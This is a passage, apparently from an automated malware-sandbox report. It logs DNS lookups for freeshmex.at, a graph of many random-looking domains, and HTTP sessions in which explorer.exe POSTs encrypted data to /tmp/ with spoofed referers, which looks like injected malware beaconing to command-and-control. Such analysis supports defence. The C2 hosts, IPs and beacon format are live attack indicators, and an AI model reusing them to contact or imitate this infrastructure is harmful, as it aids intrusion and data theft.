                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:37.534168005 CET8.8.8.8192.168.2.40xd9bbNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:38.022118092 CET8.8.8.8192.168.2.40xbba5No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.568480968 CET8.8.8.8192.168.2.40x99a5No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:39.828243017 CET8.8.8.8192.168.2.40xbafcNo error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:40.226567030 CET8.8.8.8192.168.2.40xe142No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at109.102.255.230A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at211.53.230.67A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at95.107.163.44A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at211.171.233.129A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at190.140.74.43A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at211.40.39.251A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at189.153.246.161A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at190.147.188.50A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at178.31.176.42A (IP address)IN (0x0001)false
                    Nov 24, 2022 20:13:41.322443962 CET8.8.8.8192.168.2.40xf858No error (0)freeshmex.at31.166.130.113A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • thepokeway.nl
                    • crimlvf.net
                      • freeshmex.at
                    • hdnuetf.net
                    • jccvg.com
                    • fjuand.org
                    • ugahgtu.net
                    • 123.253.32.170
                    • cbcxtvmmly.net
                    • jmhsk.org
                    • cxmexebq.com
                    • yvudclyoxi.net
                    • ewydclhcm.com
                    • ufwbup.com
                    • dmwhplnj.com
                    • xrqcl.com
                    • uuvtnsw.net
                    • fffclev.com
                    • ykhdc.net
                    • qhcqdle.org
                    • bussc.com
                    • rfiijpjae.org
                    • bowsudmxn.org
                    • slkwmgvhmh.org
                    • bpaefk.com
                    • uaymxpjge.org
                    • wfwtjemoof.com
                    • rpaquepn.com
                    • uphkrwii.org
                    • mifwrnveyh.net
                    • motvx.net
                    • bfgpwwck.net
                    • agqugnol.org
                    • gxxlrwdw.net
                    • jhiornjar.org
                    • sloljasy.net
                    • yrxav.net

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.4497155.135.247.111443C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.449696190.140.74.4380C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:00.375032902 CET137OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://crimlvf.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 167
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:00.375082016 CET137OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 19 da 88
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA .[k,vuneMZTbg_HCiYF4zg~LM#=DDiYP"{Ha
                    Nov 24, 2022 20:13:01.250077009 CET137INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:00 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 8
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 04 00 00 00 72 e8 87 ed
                    Data Ascii: r


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    10192.168.2.449705211.53.230.6780C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:16.678010941 CET1242OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://yvudclyoxi.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 338
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:16.678082943 CET1242OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 4d 29 e2 b6
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuM)OIkZv|`9-3h$vmY3U@MpUJ[|Bp@4ZOYP3m!1J"#ArzRhcd3
                    Nov 24, 2022 20:13:17.809726000 CET1242INHTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:17 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    11192.168.2.449706211.53.230.6780C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:18.988473892 CET1244OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://ewydclhcm.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 331
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:18.988473892 CET1244OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 7a 0a d8 81
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuzh0CtJMl^EK&N6Q;U5;g@MXy=:Zqo!kVG\?F#CXS'j.HUx+h!2
                    Nov 24, 2022 20:13:20.226175070 CET1245INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:19 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    12192.168.2.449707211.53.230.6780C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:20.512118101 CET1246OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://ufwbup.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 222
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:20.513123035 CET1246OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 71 3d d8 e4
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuq=PqdxJ(v6qgLU)dC@B(6JY1E6~GQ_1H~@yY:Xr4;{h5
                    Nov 24, 2022 20:13:21.587198019 CET1247INHTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:21 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    13192.168.2.449708109.102.255.23080C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:21.673352003 CET1247OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://dmwhplnj.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 241
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:21.673371077 CET1248OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 4d 21 be a2
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuM!u*{}b/HR:0(kKs3"E~Z1DvX6K1o]'(a23(G,JF;l QX|`^rvax!/z
                    Nov 24, 2022 20:13:21.905081987 CET1249INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:21 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    14192.168.2.44970995.107.163.4480C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:22.005279064 CET1250OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://xrqcl.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 211
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:22.005279064 CET1250OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 2f 36 fd a1
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu/6JNv_]g1PE>u7@<^w>Y($|~q?Q5`|S#g"XdmIKVvr
                    Nov 24, 2022 20:13:22.236107111 CET1250INHTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:22 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    15192.168.2.449710211.171.233.12980C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:22.518984079 CET1251OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://uuvtnsw.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 183
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:22.520813942 CET1251OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 42 49 da ea
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vuBIlyfJXc4nb~dFUm\.6wUS2(2*g_?o!B
                    Nov 24, 2022 20:13:23.829354048 CET1255INHTTP/1.1 200 OK
                    Date: Thu, 24 Nov 2022 19:13:23 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=utf-8


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    16192.168.2.449712211.53.230.6780C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:24.102689028 CET1256OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://fffclev.com/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 243
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:24.103812933 CET1256OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 38 26 f8 8d
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu8&7NO^nid&M4}II^U9$tU(xv44{O0O&]23"RI!3D)C*}}OC
                    Nov 24, 2022 20:13:25.188854933 CET1257INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:24 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    17192.168.2.449713178.31.176.4280C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2022 20:13:25.529270887 CET1258OUTPOST /tmp/ HTTP/1.1
                    Connection: Keep-Alive
                    Content-Type: application/x-www-form-urlencoded
                    Accept: */*
                    Referer: http://ykhdc.net/
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                    Content-Length: 271
                    Host: freeshmex.at
                    Nov 24, 2022 20:13:25.529301882 CET1258OUTData Raw: 3b 6e 55 12 f7 c3 6c 26 d9 df b2 01 06 73 7a ce 0d 0f bd 90 19 75 93 62 0f 09 09 e0 32 cb c6 63 9d 5a c1 5b 76 6d 51 1a 9c 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 7b 48 bb bd
                    Data Ascii: ;nUl&szub2cZ[vmQ?*$`7C[zqNA -[k,vu{Hd|ugkK)qmHm<?_=V<M^FW/]EIB=v7;?Uk3G=)23ZM]$9\hah!t
                    Nov 24, 2022 20:13:25.817035913 CET1259INHTTP/1.0 404 Not Found
                    Date: Thu, 24 Nov 2022 19:13:25 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                    X-Powered-By: PHP/5.6.40
                    Content-Length: 331
